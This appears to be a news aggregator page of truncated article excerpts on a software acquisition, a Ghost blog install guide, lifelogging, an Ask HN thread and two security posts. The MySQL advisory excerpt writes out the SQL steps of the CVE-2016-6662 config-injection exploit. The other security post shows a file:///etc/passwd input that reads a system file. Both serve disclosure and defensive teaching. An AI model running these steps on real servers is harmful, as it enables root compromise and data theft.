Canada’s OpenText to buy Dell-EMC’s enterprise content unit for $1.62 billion

(Reuters) – Canadian business software maker OpenText Corp said it agreed to buy Dell-EMC’s enterprise content division for $1.62 billion as it looks to expand its services to larger businesses.


Original URL: http://feeds.reuters.com/~r/reuters/technologyNews/~3/9TEqtgQ0tbA/us-dellemc-divestiture-open-text-idUSKCN11I1DP

Original article

How to Install Ghost Blog Software with Apache and SSL on Ubuntu 16.04

Ghost is a powerful Open Source publishing and blog platform that is beautifully designed and easy to use. Ghost is written in javascript and uses node.js as runtime environment. This tutorial shows the installation of the Ghost Blog software with Apache and SSL on Ubuntu 16.04.


Original URL: https://www.howtoforge.com/tutorial/how-to-install-ghost-blog-on-ubuntu/

Original article

Lifelogging is dead for now

The name Gordon Bell has become synonymous with lifelogging.Bell is the legendary engineer and researcher emeritus who recently retired from Microsoft.Bell started wearing a camera around his neck in 2000. But not just any camera. He wore an automated one that took pictures every 30 seconds. He was the main subject in a long-term experiment called the MyLifeBits project while a principal researcher at Microsoft.Gordon Bell: lifelogger and retired Microsoft researcher.
The idea was to record, capture and store every last bit of data that would later help him have a machine-enhanced photographic memory. In addition to the camera, Bell captured all his articles, lectures, presentations, memos, academic papers, home movies, IM transcripts, phone calls and more.The idea was based on the work of Vannevar Bush, who in 1945 envisioned a machine called the Memex (a portmanteau of “memory” and “index”), a kind of desk that would scan, link and instantly


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/UjOgLy4Qv4M/lifelogging-is-dead-for-now.html

Original article

Ask HN: Is web programming just a series of hacks on hacks?

Ask HN: Is web programming just a series of hacks on hacks?
374 points by barefootcoder 6 hours ago | hide | past | web | 265 comments | favorite Been doing application development, primarily backend development, for a number of years. I’ve always found it quite easy to move up and down the stack and work anywhere from UI down to the bare metal in a number of environments and languages, and always the ‘fast learner’ who quickly knows the system inside-out, even when thrown into some area that I’ve never seen.Lately I’ve been doing some web development on a fairly long-lived and large code-base, but I’m finding it MUCH harder to wrap my head around than application development ever was. I think my difficulty is that the whole environment feels so… HACKISH… everything is a horrible hack on top of a horrible hack. (yes, I’m familiar with the history,


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/QA3nqi4l40Y/item

Original article

MySQl Remote Root Code Execution 0day Exploit (CVE-2016-6662)

=============================================
– Discovered by: Dawid Golunski
– http://legalhackers.com
– dawid (at) legalhackers.com

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical
=============================================

I. VULNERABILITY
————————-

MySQL set global general_log_file = ‘/etc/my.cnf’;
mysql> set global general_log = on;
mysql> select ‘
‘>
‘> ; injected config entry
‘>
‘> [mysqld]
‘> malloc_lib=/tmp/mysql_exploit_lib.so
‘>
‘> [separator]
‘>
‘> ‘;
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf

[mysqld]

key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select ‘

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]


160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to startup during a restart due to parsing issues.

However, the important part is that the config now contains the section:

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/0z1_aQhvi9E/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Original article

If your code accepts URIs as input.. Filter out file://

There are many online sites that accept reading input from remote locations. For example a site might try to extract all the text from a webpage, or show you the HTTP-headers a given server sends back in response to a request.

If you run such a site you must make sure you validate the schema you’re given – also remembering to do that if you’re sent any HTTP-redirects.

Really the issue here is a confusion between URL & URI.

The only time I ever communicated with Aaron Swartz was unfortunately after his death, because I didn’t make the connection. I randomly stumbled upon the html2text software he put together, which had an online demo containing a form for entering a location. I tried the obvious input:

file:///etc/passwd

The software was vulnerable, read the file, and showed it to me.

The site gives errors on all inputs now, so it cannot be used to demonstrate the


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/92BFSddaKxU/If_your_code_accepts_URIs_as_input__.html

Original article

Proudly powered by WordPress | Theme: Baskerville 2 by Anders Noren.

Up ↑

%d bloggers like this: